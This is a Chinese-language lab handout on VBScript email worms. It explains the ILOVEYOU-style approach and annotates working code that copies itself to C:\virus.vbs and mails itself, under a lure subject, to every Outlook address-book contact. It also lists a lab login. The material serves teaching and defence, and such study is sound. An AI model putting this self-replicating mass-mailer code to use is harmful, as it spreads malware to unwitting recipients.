實驗目的
更加深刻地了解蠕蟲病毒;
盡量掌握蠕蟲病毒的工作原理;
時刻做好防護措施。
實驗原理
Vb script和java script是由微軟操作系統的wsh(Windows Scripting HostWindows腳本主機)解析並執行的,由於其編程非常簡單,所以此類腳本病毒在網上瘋狂傳播,瘋狂一時的愛蟲病毒就是一種vbs腳本病毒,然后偽裝成郵件附件誘惑用戶點擊運行,更為可怕的是,這樣的病毒是以源代碼的形式出現的,只要懂得一點關於腳本編程的人就可以修改其代碼,形成各種各樣的變種。
實驗內容
利用系統漏洞的惡性蠕蟲病毒分析,了解企業防范蠕蟲病毒措施、對個人用戶產生直接威脅的蠕蟲病毒、個人用戶對蠕蟲病毒的防范措施。
實驗環境描述
1、學生機與實驗室網絡直連;
2、VPC1與實驗室網絡直連;
3、學生機與VPC1物理鏈路連通。
實驗步驟
1、學生單擊實驗拓撲按鈕,進入實驗場景,進入目標主機。
2、學生輸入賬號admin ,密碼123456,登錄到實驗場景中的目標主機。如圖所示:
3、 代碼分析:
Set objFs=CreateObject(“Scripting.FileSystemObject”)(創建一個文件系統對象)
objFs.CreateTextFile ("C:\virus.txt", 1)
(通過文件系統對象的方法創建了TXT文件)
如果我們把這兩句話保存成為.vbs的VB腳本文件,點擊就會在C盤中創建一個TXT文件了。
倘若我們把第二句改為:
objFs.GetFile (WScript.ScriptFullName).Copy ("C:\virus.vbs")
就可以將自身復制到C盤virus.vbs這個文件。本句前面是打開這個腳本文件,WScript.ScriptFullName指明是這個程序本身,是一個完整的路徑文件名。GetFile函數獲得這個文件,Copy函數將這個文件復制到C盤根目錄下virus.vbs這個文件。這么簡單的兩句就實現了自我復制的功能,已經具備病毒的基本特征——自我復制能力。
此類病毒往往是通過郵件傳播的,在vb script中調用郵件發送功能也非常的簡單,病毒往往采用的方法是向outlook中的地址薄中的郵件地址發送帶有包含自身的郵件來達到傳播目的,一個簡單的實例如下:
Set objOA=Wscript.CreateObject ("Outlook.Application")(創建一個OUTLOOK應用的對象)
Set objMapi=objOA.GetNameSpace ("MAPI")(取得MAPI名字空間)
for i=1 to objMapi.AddressLists.Count(遍歷地址簿)
Set objAddList=objMapi.AddressLists (i)
for j=1 To objAddList. AddressEntries.Count
Set objMail=objOA.CreateItem (0)
objMail.Recipients.Add (objAddList. AddressEntries (j))(取得收件人郵件地址 )
objMail.Subject="你好!" (設置郵件主題,這個往往具有很大的誘惑性質)
objMail.Body="這次給你的附件,是我的新文檔!" (設置信件內容)
objMail.Attachments.Add (“c:\virus.vbs")(把自己作為附件擴散出去)
objMail.Send (發送郵件)
Next
Next
Set objMapi=Nothing (清空objMapi變量,釋放資源)
set objOA=Nothing (清空objOA變量)
4、實驗完畢,關閉虛擬機和所有窗口。